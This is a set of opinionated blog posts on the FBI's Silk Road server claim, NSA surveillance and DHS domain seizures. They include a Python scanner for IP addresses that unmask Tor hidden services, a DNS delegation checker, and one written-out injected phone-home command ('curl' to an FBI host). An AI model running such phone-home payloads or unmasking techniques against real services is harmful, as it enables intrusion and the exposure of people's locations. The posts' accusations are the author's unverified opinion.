The FBI Pwns You

A few hours ago Wired published details of the FBI’s rebuttal to the previously filed Ross Ulbricht defense motion, which proffered that the State’s case necessarily rested on evidence obtained from illegal searches (read: NSA dragnetting). The gist:

In the latest filing, however, former FBI agent Christopher Tarbell counters Ulbricht’s defense by describing just how he and another FBI agent located the Silk Road server in June of last year without any sophisticated intrusion: Instead, he says, they found a misconfiguration in an element of the Silk Road login page, which revealed its internet protocol (IP) address and thus its physical location.

As they typed “miscellaneous” strings of characters into the login page’s entry fields, Tarbell writes that they noticed an IP address associated with some data returned by the site didn’t match any known Tor “nodes,” the computers that bounce information through Tor’s anonymity network to obscure its true source. And when they entered that IP address directly into a browser, the Silk Road’s CAPTCHA prompt appeared, the garbled-letter image designed to prevent spam bots from entering the site.

The actual technical claim: arbitrary HTTP POSTs to the login form’s action leaked the server’s IP address in the response headers and/or the response body.

Probability of said claim: assuming Ulbricht (and the chain of ownership that preceded him) not to be idiots of the first order, ~0. The only likely “misconfiguration” would be the typical default configuration, which is to “leak” the web server and OS type/version in the response headers (a Server: or X-Powered-By: header). The distinction matters when weighing the claim: a version banner says what software is running, not where it is. An address only turns up if the server itself writes one into something it returns, such as a Location: header on a redirect or an absolute URL in the page body for an image or CAPTCHA resource, and the FBI description requires exactly that.
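What the described methodology amounts to as a check, written out as an added example that is not from the Wired piece, the filing or the original post: send the request, then scan the headers and body of the response for IPv4 literals, drop anything that cannot be a public host, and drop anything that matches the Tor consensus. The two sample responses and the “known Tor relay” set are constructed for the example; the live version would feed it the actual relay list and the actual response from the login form. It also shows why a banner-only response (the default-configuration “leak” above) yields nothing.

```python
"""Scan an HTTP response for IPv4 literals that could reveal a hidden service's real host."""
import ipaddress
import re

IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# Addresses that can never be the public host: loopback, RFC 1918, link-local, multicast.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4")]

# Constructed stand-in for the Tor consensus; the live check would load the real relay list.
KNOWN_TOR_RELAYS = {"198.51.100.10", "198.51.100.11"}

# Constructed sample responses (not captured traffic). The first mirrors the FBI's description:
# a redirect and an image URL both carry an address that is not a Tor relay. The second carries
# only software banners, the "default configuration" kind of leak.
SAMPLE_LEAK = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: nginx/1.4.1\r\n"
    b"Location: http://203.0.113.7/login?err=1\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b'<html><body><img src="http://203.0.113.7/captcha.php">'
    b'<a href="http://198.51.100.10/">mirror</a></body></html>'
)
SAMPLE_BANNER_ONLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.2.22 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/5.3.10-1ubuntu3\r\n"
    b"\r\n"
    b"<html><body>Login failed</body></html>"
)


def split_response(raw):
    """Return (status line, {header-name: value}, body) from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.decode("latin-1", "replace")


def candidate_ips(text):
    """IPv4 literals in text that could be a public host (version strings are not matched)."""
    found = []
    for token in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(token)
        except ValueError:            # e.g. "999.1.1.1"
            continue
        if not any(ip in net for net in LOCAL_NETS):
            found.append(str(ip))
    return found


def scan_response(raw, known_tor_relays=KNOWN_TOR_RELAYS):
    """Map each non-Tor, non-local address to where it appeared (header name or body)."""
    status, headers, body = split_response(raw)
    seen = {}
    for name, value in headers.items():
        for ip in candidate_ips(value):
            seen.setdefault(ip, set()).add("header:" + name)
    for ip in candidate_ips(body):
        seen.setdefault(ip, set()).add("body")
    leaks = {ip: sorted(where) for ip, where in seen.items() if ip not in known_tor_relays}
    return {"status": status, "banner": headers.get("server", ""), "leaks": leaks}


if __name__ == "__main__":
    for label, sample in (("leak", SAMPLE_LEAK), ("banner-only", SAMPLE_BANNER_ONLY)):
        print(label, scan_response(sample))
```

Run against real traffic, the interesting output is the leaks dictionary: an address showing up under header:location or in the body that is neither local nor in the consensus is the thing the filing says was found. The banner-only sample returns an empty leaks map and only the Server: string, which is the point made above about default configurations.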

If we assume the FBI letter to be a half-truth, which frankly is not necessarily a reasonable presumption to make (as opposed to, say, the outright lie), we can offer a more accurate technical translation:

We sent a malicious string in the request body of a login submission to inject an executable code payload, $ curl http://laundry.forensics.fbi.gov, which essentially allowed us to perform a remote drive-by phone home on the target.

Now, if we assume the half-truthiness of the FBI in this matter, we can deduce a methodology of counter-attack by US intel organs against network obfuscation techniques, namely directly attacking the target at the application layer. In other words, the use of code-injection or buffer-overflow exploits (zero-day or not) on the target itself to perform drive-by phone homes, or in a more sophisticated attack, to install a wiretap implementation.

Going forward, one has to assume that the use of “cyber-hacking” as a means to facilitate a court-approved wiretap will be deemed legal in much the same way breaking into your property to install the old-fashioned wiretaps was deemed legally proper. Of course, I would be remiss not to point out that the legal sanctification of State hacking by organs of the justice department provides a very convenient laundromat for laundering the legality of any data collected by the 3-hop graphical dragnet (read: NSA).

Finally, it should be noted that it’s not surprising the State would eventually seize on this vector of attack. Since 1988 (the infamous Morris worm), it has been well known that the weakness of the internet was not in the layered protocol design itself but in the client-server software implementing the protocol standards. In particular, programs written in C and C++ are susceptible to memory-safety violations in string operations on data of arbitrary length (an unbounded copy into a fixed-size buffer), resulting in access violations that become more than a crash if the overflowing data is carefully formatted to redirect execution. In a sense, it is a large enough problem that it could have killed the internet from the start if not for a sort of spontaneous, heuristic regime of security best practices that arose and limited the problem of rogue actors to a tolerable one.

But if the heuristic law saved the internet, it is the “rule of law” that will surely kill it (in terms of being a utopian instrument). For it is the latter which turns software vulnerabilities into a primary means of both wiretapping targets and laundering graphical dragnets, reminding us, once again, that the State is indeed its own agency and its preservation best executed by a type of competitive agency of invasion of the body snatchers.

The State is its Own Agency

That the NSA has now commenced with overt pressure campaigns to countermand any legislative effort to curtail its vast surveillance enterprise cements an obvious liberal dilemma regarding the agency of the State. Make no mistake, totalitarian spying exemplifies an agency whose ends are in competition with the ends of its own citizens. This is a fatal violation of the liberal paradigm out in the open, staring you right in the face.

The germane question which moves to the fore of consideration hence pertains to the extent of government surveillance. Is it indeed totalitarian? If we were to constrain the scope of consideration strictly to the NSA itself, then the answer would probably be no. Its modus operandi does not follow the traditional taxonomy of the textbook totalitarian spymaster. However, thanks to the documentation leaked by Edward Snowden, what we have now is confirmation of the cypherpunk dystopian model, which in a real sense is much worse, for it portends a sustainable template of planetary social control. The NSA in and of itself is one thing. However, in the larger context of its coerced “strategic partnerships” with the top US internet and software companies, as the means to facilitate/execute the data collection requirements, what we end up with is quite another: the equivalent of a libpcap capture library on every one of your network devices persistently cataloging your “matrix” in the well-connected social graph, built and maintained under the “legal auspices” of a three-hop dragnet.

In light of the Snowden revelations, the NSA has embarked on the aforementioned pressure and information campaign to countermand the PR damage. Just yesterday, the NSA released two documents that purport to dispel the notion of it being an agency of totalitarian collection. Having just read them, I can say that the 1.6% statistic of “touched traffic” and the 0.025% statistic of “reviewed traffic”, on a daily basis, are highly misleading. The first hoodwink is the denominator: out of the exabyte daily traffic volume, roughly 60%-70% is IP video traffic [1], which shrinks our “basketball court” down to the size of a racquetball court. The second hoodwink is to imply that the sampling follows a pattern of independent random trials, in the classic stats model of proving or disproving a hypothesis drawn from a random sample, instead of what it actually is: the accumulation of a graph-based document store enabling a traversable, retrospective query system. The whole thing is just plain subterfuge.

By now, it should be apparent that I consider the cypherpunks to be the most relevant social scientists of our day, in no small part because they are at the forefront of the battle lines of 21st century political economy. Assange, for one, has been singularly confirmed on a number of points. In particular, the US reaction of “Insider Threat” has to count as spectacular confirmation of his thesis of “conspiracy and networks.” The kernel of differentiated political and economic jurisdiction that always lurked beneath the rationale of WikiLeaks now seems obvious in light of what is required for secure and autonomous cloud computing platforms going forward [2]. Assange’s contention that legal and regulatory entities were engaging in data laundering, that is, ex post manufacturing legal reconstructions of “evidence” gathered from the NSA dragnet spying enterprise, has since been confirmed by Reuters with respect to two agencies: the DEA and the IRS.

In contrast, the “liberal” political and academic establishment are dinosaurs. No better example of this than this piece at “Bleeding Heart Libertarians,” The United States is not a Police State. The entire piece is a confirmation of my (quite prescient, as it turns out) old post, Free Market Fairness: A bridge to nowhere. Fernando Teson’s entire argument boils down to the position that truth should never stand in the way of mainstream recognition. Of course, as I pointed out in that earlier post, the “respectable libertarian formulation,” in the form of the Chicago school, had held sway for thirty years in the domain of finance and “regulatory reform,” leading to nothing but banking oligarchy and a permanent severance of political freedom from capitalism. As I pointed out at the end, all it would take would be a minority dissident faction to blow that entire thesis to smithereens and force the “bleeding hearts” to side with what everyone and their brother, outside of polite academic company, knew to be tyranny and oppression. I’m not surprised “Edward Snowden” doesn’t appear in any post on that site, outside one inclusion in an obscure link.

Frankly, the boogeyman of North Korea is tiresome as the singleton measuring stick of totalitarianism. For starters, the inquisitive person might ask just how long North Korea would last if not for China and the US directly and indirectly propping it up (which should trigger a deeper discussion of the taxonomy to begin with when considering States that prop up even worse monsters). However, the better question might be why 21st century totalitarianism is persistently cast in the mold of the mid-20th century Soviet model when that model, in terms of having any sphere of international influence, died out two decades ago.

In the recent book, “Cypherpunks: Freedom & The Future Of The Internet,” Andy Muller-Maguhn specifically outlines the stated intent of our 21st century spooks: the use of secrecy as a means to gain control of social processes. This presents a countervailing agency problem more along the lines of a “squishy totalitarianism,” but this is more than sufficient to eviscerate the liberal paradigm. In fact, it acquires a particularly sinister aura because it appears quite apparent that most are quite comfortable persisting in the liberal mythology within its confines. The industries of “social justice” and “the invisible hand of market social coordination” will continue to spit out oblivious drivel because, after all, they are “industries.”

As I have noted on previous occasions, the planned order of surveillance introduces a potentially glaring incentive-incompatibility agency problem into market exchange. One that makes mincemeat of any position that uses the existence of markets as an immediate counterfactual to any claim of systems of social control. If we cast “spontaneous order” as a type of “social graph” and then analytically run it against the “planned order of surveillance” that exists to anatomize it, we obtain a “second-order dynamic” between the social graph and its surveillance that illuminates the distinction between laissez-faire and capitalism with far greater clarity than the dinosaur methods of 20th century classical liberalism still mired in the roots of the socialist calculation debates.

Frankly, to avoid serious methodological error, one should start from the assumption of “the State as its own Agency.” Everything else flows from there…

[1] As I pointed out in this old post, Technology is not Freedom, IP video has its own extensive surveillance regime.

[2] Ideological preferences aside, the cloud, in any rent-seeking context, is where the internet goes because it is simply a much more efficient computing platform.

When Mickey Mouse and Barney Fife Join Forces

TechDirt has the latest regarding the Mickey Mouse/Barney Fife operation that is behind the DHS seizure of domains.

I reviewed the “technical aspects” of the affidavit, at least the original partial one that can be found here, and it pretty much confirms what I originally reported in this post, The Background Dope on DHS Recent Seizure of Domains. At the time of my original post on this subject, it was not verifiable whether these “seizures” were part of an “official operation” or not, or if the instigators behind this were the usual suspects, the MPAA and RIAA. When DHS announced this was part of an official operation, Operation In Our Sites 2, I wrote an update post here; and based on a subsequent LA Times article, I posted a comment here that reflected the fact that the MPAA and RIAA were the ones who were reporting the “violating sites.”

Some notes on the affidavit:

It clearly specifies that the domain seizure was to be executed by going through VeriSign. I detailed the mechanics of how that was done in my original post. However, the affidavit also clearly specifies that the domains were to be transferred in ownership over to DHS/ICE vis-à-vis their respective registrars. That has not happened yet. It was supposed to be done, but whois queries against the registrar databases for the domains in question indicate that it has not been done.

The affidavit gets the registrar, the IP address and the hosting provider for torrent-finder.com wrong. It lists Blue Razor as the registrar, and even though Blue Razor appears to be owned by the same entity that owns GoDaddy, it is GoDaddy who is the registrar. The hosting provider for torrent-finder.com is SoftLayer Technologies, located in Dallas, TX, and not Secure Hosting LTD, located in the Bahamas.

Reading the affidavit, particularly as it pertained to torrent-finder.com, I now know why ICE subcontracts out to “private companies” like immixGroup IT Solutions. We are literally dealing with Agent Barney Fife here. Writes Agent Fife:

“Based on my training and experience, queries of public movie listings and my discussion with MPAA representatives, I know that “Secretariat” is a first run movie that was released to the general public for homeviewing.”

Whoa, all that tax-payer funded training gave Agent Fife the requisite specialized knowledge to figure that all out by himself. I’m sure all that experience has trained him to first check with government computers to make sure that information wasn’t classified.

Agent Fife outlines how his specially trained snooping abilities led him to conclude that torrent-finder.com was actually hosting “pirated content.” The problem for Agent Fife, however, is that the “download link” that he clicked on that allowed him to directly download a torrent for “The Town” was actually being hosted by torecache.com in Estonia. We dread the day when agent Fife’s superior training and experience leads him to discover The Google can be used to pull up direct links to torrent files the MPAA disapproves of.

This is exhibit A of Hayek’s “how the worst get to the top”….

Respectable Bomb Throwers

A former fellow contributor at Freedom Democrats has composed two recent posts, My respectability vs. their legitimacy and Are you on the inside or the outside?, that caution against radical politics moving from an abstract layer of persuasive speech to one advocating criminal activity. The underlying factor here seems to be that WikiLeaks is raising the stakes, making the abstract suddenly tangible. An abstraction is now drawing some blood…it’s a threat. The cautionary thinking here is not to overplay the hand, not to resort to advocating the equivalent of anarchist bomb throwing, which could not only make one the target of the police (the police state) but which could also threaten to criminalize the abstraction itself, or at the very least, banish it from the topics of polite society.

Now I both agree and disagree with Ricketson. I agree that “anarchist bomb throwing,” whether it’s actually throwing bombs or executing DDoS attacks against digital targets, is a loser strategy. You can try to cast these things into a type of “civil disobedience” rationale or justify them as defensive actions against Statist aggression, but the bottom line is that they are ineffective and counter-productive. And Ricketson’s point about the “mainstream” should be taken to heart. The thing about “American radical libertarianism” that separates it from “anarchism” in general is that in America, radical libertarianism is more or less “liberal anarchism,” and liberal anarchism has never sought to eradicate the “petty bourgeoisie” as a precursor to some new social order. Indeed, liberal anarchism embraces the “petty bourgeois” tradition as a mainstream tradition. This to no end infuriates a larger segment of anarchist radicals who operate outside the “liberal anarchist tradition.”

Where I disagree with Ricketson perhaps starts with this quote by Janet Napolitano:

“The old view that ‘if we fight the terrorists abroad, we won’t have to fight them here’ is just that – the old view,” Homeland Security Secretary Janet Napolitano told police and firefighters recently.

Ricketson takes his alias from Benjamin Tucker and those who are familiar with libertarian history know that Tucker, after he left the United States and emigrated to France, actually supported World War I on the basis that the German glorification of military culture was such a threat to the “petty bourgeois” liberal tradition that it had to be opposed, even by force. Here I am reminded of the old Barry Goldwater joke, “vote for Goldwater and we will end up in Vietnam.” Well, a wag or two have been known to crack back in the day, “we voted for Goldwater and sure enough, we ended up in Vietnam.” To Tucker’s Ghost I would crack, the United States went to war and yet we ended up with the very thing you dreaded.

As Orwell brilliantly elucidated, permanent war is the permanent war of the ruling class against its own citizens. It is a destroyer of liberalism. It is the National Security State, not anarchism, which is the threat to the mainstream of a “petty bourgeois” polite society. The horror is to contemplate just exactly what is to become of this “mainstream” under a censorship regime, when uncensored abstraction itself, by definition, is a threat.

In a permanent War on Terror, terrorism is not bomb throwing, rather it is any ideological challenge to the “Status Quo.” When Janet Napolitano states that the guns have turned inward, she doesn’t mean they are pointing at some random asymmetric violent threat, rather she means they are pointing at any systemic abstract threat to the Status Quo. They are aimed at any “institutional alternatives” to the status quo. If these “institutional alternatives” draw any blood, that is, threaten the Status Quo, those guns will fire…and it would be impolite in polite society not to pretend otherwise.

Respectability=see no evil, hear no evil, speak no evil…

The Background Dope on DHS Recent Seizure of Domains

As has been reported, it looks like ICE, which is the principal investigative arm of DHS, has begun seizing domains under the pretext of IP infringement. But it’s actually not ICE who is executing the mechanics of the seizures. It’s a private company, immixGroup IT Solutions. Here is what is going down.

In May of this year, immixGroup IT Solutions was awarded a one year IT services contract with DHS. The particulars of this contract:

Under this new contract, immixGroup will provide information technology operational services and support, implementation, and maintenance of DHS ICE C3’s software applications, network and CyberSecurity systems, as well as the maintenance and enhancement of applications that support law enforcement activities.

The contract includes one base year, one 12-month option period, and two six-month option periods; covers all four divisions of C3 (Child Exploitation, Cyber Crimes, Computer Forensics, and Cyber Training); and is critical to C3’s pursuit of criminal activity. immixGroup’s services in this effort include network maintenance, application development and support, forensic lab assistance, data storage maintenance, and information assurance.

On November 24th, immixGroup IT Solutions registered the domain SEIZEDSERVERS.COM, and primary and secondary nameservers, NS1.SEIZEDSERVERS.COM, NS2.SEIZEDSERVERS.COM, with Network Solutions, which is the registrar for this domain. Since the DHS contract is provisionally for one year only, the domain was only registered for one year (it expires in one year).

immixGroup IT Solutions is using CaroNet to host their domain, including the authoritative name servers (NS1.SEIZEDSERVERS.COM, NS2.SEIZEDSERVERS.COM) for this domain. They have set up a simple web page, http://seizedservers.com/ or http://74.81.170.110, which is the same “Notification of Seizure” page you will get if you type one of the seized domains into the browser address bar (if you’re paranoid: yes, they are tracking using both Google Analytics and Piwik).

ICE is not actually “seizing” any servers or forcing hosting companies to remove web content from their servers; what they are doing is using immixGroup IT Solutions to switch the authoritative name servers for these “seized domains.” But they are not doing it at the registrar level (by contacting the registrar for the domain and forcing it to update the authoritative name server info to point to NS1.SEIZEDSERVERS.COM, NS2.SEIZEDSERVERS.COM), but rather through the registry that operates the top-level domain. In this case, all the “seized domains” appear to be .com, and the company holding the ICANN contract for this TLD is VeriSign (which also operates the .net TLD). The change is to the NS delegation records published in the .com zone itself, which is served by the top-level authoritative name servers [a-m].gtld-servers.net. These are controlled by VeriSign (note: these top-level name servers are also authoritative for the .net and .edu TLDs). The practical consequence is that the registrar’s own record for the domain, which is what a whois lookup returns, can still list the original name servers while every resolver on the internet is being handed the seizure name servers.

So VeriSign, the registry operator for the .com TLD, is working in cooperation with DHS, and it appears immixGroup IT Solutions has what we might call an “IT support ticket system” set up with VeriSign.
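The registry-versus-registrar distinction above, and the whois check mentioned in my notes on the affidavit, can be verified directly: ask a .com registry server for the delegation with recursion disabled, and compare it with the name servers the registrar still records. The following is an added example and not tooling from the original post; it builds the DNS query by hand so the only dependency is the standard library. The address used for a.gtld-servers.net is an assumption to confirm with dig, the sample response is constructed to look like a registry answer (not captured traffic), and the registrar-side list is a placeholder where a whois result would go.

```python
"""Ask a .com registry server for a domain's NS delegation (stdlib only)."""
import socket
import struct
import sys

GTLD_SERVER = "192.5.6.30"      # assumed address of a.gtld-servers.net; confirm with dig
TYPE_NS, CLASS_IN = 2, 1


def encode_name(name):
    """Wire-format a dotted name: length-prefixed labels, zero terminator."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def build_ns_query(domain, txid=0x1234):
    # flags 0x0000: RD clear, so the registry answers from the .com zone only
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(domain) + struct.pack(">HH", TYPE_NS, CLASS_IN)


def decode_name(msg, off):
    """Decode a (possibly compression-pointer) name; return (name, end offset)."""
    labels, end, jumped = [], off, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # pointer into earlier data
            ptr = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    if not jumped:
        end = off
    return ".".join(labels).lower(), end


def parse_ns_records(msg):
    """Collect NS targets from the answer and authority sections."""
    _, _, qd, an, ns, _ = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(msg, off)
        off += 4                                        # qtype + qclass
    targets = []
    for _ in range(an + ns):
        _, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        if rtype == TYPE_NS:
            targets.append(decode_name(msg, off)[0])
        off += rdlen
    return sorted(targets)


def query_delegation(domain, server=GTLD_SERVER, timeout=3.0):
    """Live UDP query to the registry server (needs network)."""
    q = build_ns_query(domain)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, 53))
        data, _ = s.recvfrom(4096)
    if data[:2] != q[:2]:
        raise ValueError("transaction id mismatch")
    return parse_ns_records(data)


def classify(registry_ns, registrar_ns):
    """Compare the registry's delegation with the name servers the registrar records."""
    if set(registry_ns) == set(registrar_ns):
        return "consistent"
    if any(n.endswith("seizedservers.com") for n in registry_ns):
        return "registry-level redelegation to seizure nameservers"
    return "registry and registrar disagree"


def constructed_response():
    """Hand-built reply in the shape of a registry answer (constructed, not captured)."""
    hdr = struct.pack(">HHHHHH", 0x1234, 0x8400, 1, 0, 2, 0)     # QR|AA, two authority RRs
    question = encode_name("torrent-finder.com") + struct.pack(">HH", TYPE_NS, CLASS_IN)
    # 0xC00C -> owner name at offset 12; 0xC01B -> the "com" label inside the question
    rdata1 = b"\x03ns1\x0dseizedservers\xc0\x1b"
    rr1 = b"\xc0\x0c" + struct.pack(">HHIH", TYPE_NS, CLASS_IN, 172800, len(rdata1)) + rdata1
    rdata2 = b"\x03ns2\xc0\x34"                                 # 0xC034 -> "seizedservers.com" in rr1
    rr2 = b"\xc0\x0c" + struct.pack(">HHIH", TYPE_NS, CLASS_IN, 172800, len(rdata2)) + rdata2
    return hdr + question + rr1 + rr2


if __name__ == "__main__":
    # Placeholder for the registrar-side list; a real run would take it from whois output.
    registrar_ns = ["ns1.example-hosting.invalid", "ns2.example-hosting.invalid"]
    if len(sys.argv) > 1:
        registry_ns = query_delegation(sys.argv[1])           # live query against the registry
    else:
        registry_ns = parse_ns_records(constructed_response())
    print("registry delegation:", registry_ns)
    print("verdict:", classify(registry_ns, registrar_ns))
```

With no argument it parses the constructed answer and reports the redelegation; with a domain argument it sends the query to the registry server and compares the live delegation against whatever registrar-side list you paste in. The RD bit is left clear on purpose: the point is to see what the registry itself publishes, not what some recursive resolver has cached.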

That web servers are not being seized and web content not being deleted can easily be verified by clicking this link, http://208.101.51.57, which is the original IP Address of a seized domain, torrent-finder.com. It’s still up, and it appears it has registered a new domain, torrent-finder.info, that resolves to the original IP address. This site is being hosted by SoftLayer Technologies in Dallas, TX. So, it is certainly within US jurisdiction to be shut down if there was “a case to be made.”

Now the .info TLD is not operated by VeriSign; it’s operated by Afilias. So, an interesting little experiment would be to see if the torrent-finder.info domain remains up. As of now, we can only conclude that there is a back-room deal between DHS and VeriSign that makes any .com or .net domain subject to seizure by the actions of immixGroup IT Solutions.

Lastly, there has been some speculation that this recent business of “domain seizure” portends the same tactics being used to seize the “wikileaks.org” domain. From a technical standpoint, understand that the .org TLD is not operated by VeriSign; it is operated by the Public Interest Registry. An interesting thing, however: PIR has contracted out the technical operations to Afilias. So, if we were to see torrent-finder.info similarly seized, then this would mean that Afilias is also in cahoots with DHS, which could imply the .org TLD could be subject to the same type of “domain seizures.” As of now, there is no evidence of that. And, it should be clear, this type of domain seizure is completely different from the 2008 attempted shutdown of wikileaks.org by the US government. In that case, a U.S. District Court issued an injunction ordering Dynadot, which was the registrar for the domain, to remove all traces of Wikileaks from its records. That didn’t hold up.